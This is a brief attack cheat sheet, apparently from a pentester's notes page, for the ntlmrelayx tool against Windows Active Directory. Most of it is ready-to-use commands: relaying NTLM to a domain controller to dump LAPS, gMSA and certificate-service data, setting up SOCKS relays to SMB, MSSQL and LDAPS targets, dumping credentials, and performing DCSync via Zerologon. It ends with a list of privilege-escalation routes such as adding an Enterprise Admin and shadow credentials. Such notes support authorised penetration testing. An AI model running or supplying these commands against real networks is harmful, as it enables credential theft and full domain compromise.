Ntlmrelayx
1) Enumeration
ntlmrelayx.py ldap://dc --dump-adcs --dump-laps --dump-gmsa --no-da --no-acl2) SOCKS Proxy
ntlmrelayx.py -t smb://target -socks
ntlmrelayx.py -t mssql://target -socks
ntlmrelayx.py -t ldaps://target -socks3) Creds dump
ntlmrelayx.py smb://target4) DCSync if the target in vulnerable to Zerologon
ntlmrelayx.py dcsync://dcPrivilege Escalation
1) Add an user to Enterprise Admins.
2) Kerberos Delegation (RBCD in our case)
3) Shadow Credentials
4) From a mitm6 authentication
5) Relay to WinRMs
Last updated